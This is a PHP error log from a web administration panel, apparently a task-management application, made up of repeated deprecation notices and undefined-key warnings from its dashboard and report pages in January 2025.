Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 12:01:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 12:10:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 12:10:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [16-Jan-2025 12:10:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [16-Jan-2025 12:18:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 12:18:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 12:59:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 12:59:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 13:09:42 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 13:09:42 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 13:37:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 14:30:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 14:30:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 14:30:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 16:36:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 16:36:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 16:36:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 16:52:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 16:52:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 16:52:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 16:57:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 16:57:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 17:01:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 17:01:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 17:27:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 17:27:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 17:27:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 12:00:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 12:00:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 12:00:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 14:13:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 14:13:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 14:13:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 14:13:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 14:13:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 14:13:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 16:30:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 16:30:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 16:30:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [17-Jan-2025 18:22:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Jan-2025 18:22:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [17-Jan-2025 18:22:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Jan-2025 08:57:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Jan-2025 08:57:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Jan-2025 08:57:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Jan-2025 12:00:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Jan-2025 12:00:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Jan-2025 12:00:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Jan-2025 14:31:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Jan-2025 14:31:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Jan-2025 14:31:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Jan-2025 16:30:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Jan-2025 16:30:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Jan-2025 16:30:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Jan-2025 11:51:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 11:51:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [21-Jan-2025 11:51:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Jan-2025 12:00:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 12:00:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [21-Jan-2025 12:00:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Jan-2025 12:04:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 14:32:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 14:32:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [21-Jan-2025 14:32:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Jan-2025 15:42:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 16:32:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Jan-2025 16:32:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [21-Jan-2025 16:32:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 12:00:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [22-Jan-2025 12:00:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 12:00:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 14:30:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [22-Jan-2025 14:30:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 14:30:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 16:25:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [22-Jan-2025 16:25:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 16:25:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 16:26:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 16:26:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [22-Jan-2025 16:27:43 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 23 [22-Jan-2025 16:27:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [22-Jan-2025 16:27:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 00:31:25 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 00:31:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 00:31:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 09:36:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 09:36:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 09:36:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 10:04:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Jan-2025 10:04:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Jan-2025 10:08:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 10:08:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 10:31:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 10:31:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Jan-2025 10:31:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Jan-2025 10:47:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 10:47:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 10:50:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 10:50:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 10:50:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 12:04:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 12:04:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 12:04:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 12:49:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 13:02:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 13:02:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 13:02:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Jan-2025 13:02:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Jan-2025 13:02:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Jan-2025 13:02:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Jan-2025 14:31:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 14:31:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 14:31:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 16:30:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 16:30:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 16:30:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 11:59:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 11:59:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 11:59:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 11:59:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 14:33:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 14:33:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 14:33:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 14:51:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 14:51:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 14:51:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 14:54:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 14:54:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 14:55:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 15:17:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 15:17:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 16:30:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 16:30:42 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 16:30:42 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Jan-2025 21:59:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Jan-2025 22:00:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Jan-2025 22:02:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Jan-2025 12:00:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Jan-2025 12:00:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [28-Jan-2025 12:00:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [28-Jan-2025 14:34:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Jan-2025 14:34:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [28-Jan-2025 14:34:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [28-Jan-2025 16:30:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Jan-2025 16:30:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [28-Jan-2025 16:30:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 00:41:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 00:41:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 00:41:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 